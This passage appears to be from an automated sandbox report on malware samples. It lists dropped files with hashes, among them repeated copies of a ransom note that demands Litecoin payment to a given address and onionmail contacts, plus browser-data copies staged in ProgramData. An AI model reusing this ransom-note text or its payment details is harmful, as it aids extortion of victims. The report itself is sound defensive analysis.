                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Esl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Resource\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\5FCJEU

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\8GDTRQ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\DB1V3O

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\E3WLNO

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9816
                                                                                                                                                                                                                                                Entropy (8bit):5.5323081253820385
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qnaRtZYbBp6ihj4qyaaX86KakfGNBw8MJSl:degquOcwV0
                                                                                                                                                                                                                                                MD5:72E631CDC5B4127D54EAFB484B4E43D3
                                                                                                                                                                                                                                                SHA1:252C1774D233078675ABAD8F13DF1FC1EE3B7DA4
                                                                                                                                                                                                                                                SHA-256:58D057DB1A3CFF3E178A0509E956A1CCD2FB5C8115773764686EA6E947D7CFEA
                                                                                                                                                                                                                                                SHA-512:C421810480C65DB90554E7677601D15979311C6CE2E1BDC026BF2551A581DA6EC9A61090C075CE6E2B13B412D22468089A59799A9FC87DE357870C194A4068F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\EUS26P

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\IEUKNG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\M7Y5PZ

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\Q90R90

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\ProgramData\5PPP8YCJW4E3\R9Z5X4W47

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
